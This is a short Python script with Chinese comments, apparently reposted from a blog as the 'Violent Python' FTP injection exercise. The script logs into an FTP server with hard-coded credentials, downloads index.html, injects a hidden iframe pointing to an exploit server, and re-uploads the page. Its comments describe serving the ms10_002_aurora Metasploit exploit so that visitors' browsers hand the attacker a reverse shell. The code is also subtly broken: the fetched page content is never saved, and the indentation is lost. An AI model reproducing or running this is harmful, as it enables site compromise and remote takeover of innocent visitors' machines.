# coding=UTF-8
# time: 18-1-5: 下午3:14
# Author: Xifeng2009
'''
在网页中加入恶意注入代码
找到网页文件后,必须用恶意重定向代码感染它们,
为了快速创建一个位于 http://10.10.10.112:8080/exploit 的恶意服务器和页面,
我们将使用Metasploit框架, 选择ms10_002_aurora
10.10.10.112:8080/exploit 上的网页会利用被重定向到这里的浏览器中的漏洞,
使之向我们提供一个反向连接,令我们能通过这个反向链接来控制这台肉鸡
'''
import ftplib
'''运行代码,下载index.html,并在其中注入恶意内容,并上传'''
def injectPage(ftp, page, redirect):
f = open(page + '.tmp', 'w') # 下载FTP文件
ftp.retrlines('RETR ' + page)
print("[+] Downloaded Page: " + page)
f.write(redirect) # 写入恶意代码
f.close()
print("[+] Injected Malicious IFrame on " + page)
ftp.storlines('STOR ' + page, open(page + '.tmp', 'rb')) # 上传目标文件
print("[+] Uploaded Injected Page: " + page)
host = '127.0.0.1'
userName = 'uftp'
passWord = 'uftp'
ftp = ftplib.FTP(host)
ftp.login(userName, passWord)
redirect = "<iframe src='http://192.168.100.113:8080/exploit'></iframe>"
injectPage(ftp, 'index.html', redirect)Violent Python FTP注入
猜你喜欢
转载自blog.csdn.net/qq_31017793/article/details/78984382
今日推荐
周排行